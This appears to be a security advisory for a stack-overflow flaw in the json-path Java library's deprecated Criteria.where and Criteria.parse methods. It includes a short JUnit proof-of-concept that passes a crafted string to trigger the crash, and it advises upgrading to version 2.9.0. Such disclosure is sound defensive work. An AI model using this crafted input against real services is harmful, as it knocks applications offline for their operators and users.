Affected versions of this package are vulnerable to Buffer Overflow via the deprecated Criteria.parse or Criteria.where methods. An attacker can disrupt the regular operation of the application by supplying a specially crafted input that triggers a stack overflow.
Exploiting this vulnerability requires insecure configurations on the server side, for example - handling requests in a one single thread.
PoC
import com.jayway.jsonpath.Criteria;
import org.junit.Test;
public class CriteriaFuzzerWhere1 {
// Stack overflow
@Test
public void whereFuzzerTest() {
try {
Criteria result = Criteria.where("[']',");
} catch (Exception e) {
}
}
}
Remediation
Upgrade com.jayway.jsonpath:json-path to version 2.9.0 or higher.